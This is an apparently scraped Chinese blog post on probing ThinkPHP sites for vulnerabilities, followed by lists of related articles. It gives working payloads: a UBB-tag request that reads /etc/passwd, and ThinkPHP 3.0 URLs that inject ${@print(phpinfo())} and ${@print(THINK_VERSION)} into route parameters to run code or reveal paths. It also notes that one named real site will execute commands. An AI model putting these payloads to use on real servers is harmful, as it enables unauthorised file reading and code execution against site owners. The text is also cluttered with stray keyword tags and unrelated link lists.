Thinkphp 漏洞小试
首先肯定这个网站使用thinkphp的框架 php
国内不少php开源项目的代码都是使用thinkphp框架编写的,可是thinkphp框架有不少版本,如何才能知道咱们使用的框架是哪一个版本的呢? html
在URL后面加thinkphp的目录,也有可能爆出来 web
这是一个tankphp的网站目录。供参考 thinkphp
-
admin是后台工程文件夹
-
home是前台工程
-
public里面用于存放CSS文件,JS文件以及网页里面的图片
-
ThinkPHP框架
-
ueditor是百度编辑器
ThinkPHP的Ubb标签漏洞读取任意内容
localhost/index/?path=[code]/etc/passwd[/code] shell
附图 php框架
hinkphp 3.0 爆路径漏洞
1. thinkphp3.0 模块加载失败,出错信息爆应用程序路径。 安全
检测有两种状况 app
1. 可执行命令,这个估计是伪3.0版本? 框架
交大定票 编辑器
此站到能够执行命令
http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D
可查看版本
http://webshell.cc/index.php/module/action/param1/$%7B@print(phpinfo())%7D
可查看phpinfo信息
2. 不可执行命令,爆路径
http://webshell.cc/appscn/index.php/module/action/param1/$%7B@print(phpinfo())%7
http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7
http://webshell.cc/index.php/module/action/module/param1/$%7B@print(THINK_VERSION)%7D
- 1. thinkphp历史漏洞
- 2. ThinkPHP漏洞总结
- 3. thinkphp漏洞集合
- 4. ThinkPHP 漏洞检测
- 5. ThinkPHP框架漏洞
- 6. ThinkPHP 3.0~3.2 注入漏洞
- 7. ThinkPHP V5 漏洞利用
- 8. thinkPHP命令执行漏洞
- 9. ThinkPHP-漏洞分析集合
- 10. 网站漏洞怎么修复对于thinkphp的漏洞修复
- 更多相关文章...
- • Lua 调试(Debug) - Lua 教程
- • Eclipse Debug 调试 - Eclipse 教程
- • 为了进字节跳动,我精选了29道Java经典算法题,带详细讲解
- • 三篇文章了解 TiDB 技术内幕——说存储
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 外部其他进程嵌入到qt FindWindow获得窗口句柄 报错无法链接的外部符号 [email protected] 无法被([email protected]@[email protected]@@引用
- 2. UVa 11524 - InCircle
- 3. The Monocycle(bfs)
- 4. VEC-C滑窗
- 5. 堆排序的应用-TOPK问题
- 6. 实例演示ElasticSearch索引查询term,match,match_phase,query_string之间的区别
- 7. 数学基础知识 集合
- 8. amazeUI 复择框问题解决
- 9. 背包问题理解
- 10. 算数平均-几何平均不等式的证明,从麦克劳林到柯西
- 1. thinkphp历史漏洞
- 2. ThinkPHP漏洞总结
- 3. thinkphp漏洞集合
- 4. ThinkPHP 漏洞检测
- 5. ThinkPHP框架漏洞
- 6. ThinkPHP 3.0~3.2 注入漏洞
- 7. ThinkPHP V5 漏洞利用
- 8. thinkPHP命令执行漏洞
- 9. ThinkPHP-漏洞分析集合
- 10. 网站漏洞怎么修复对于thinkphp的漏洞修复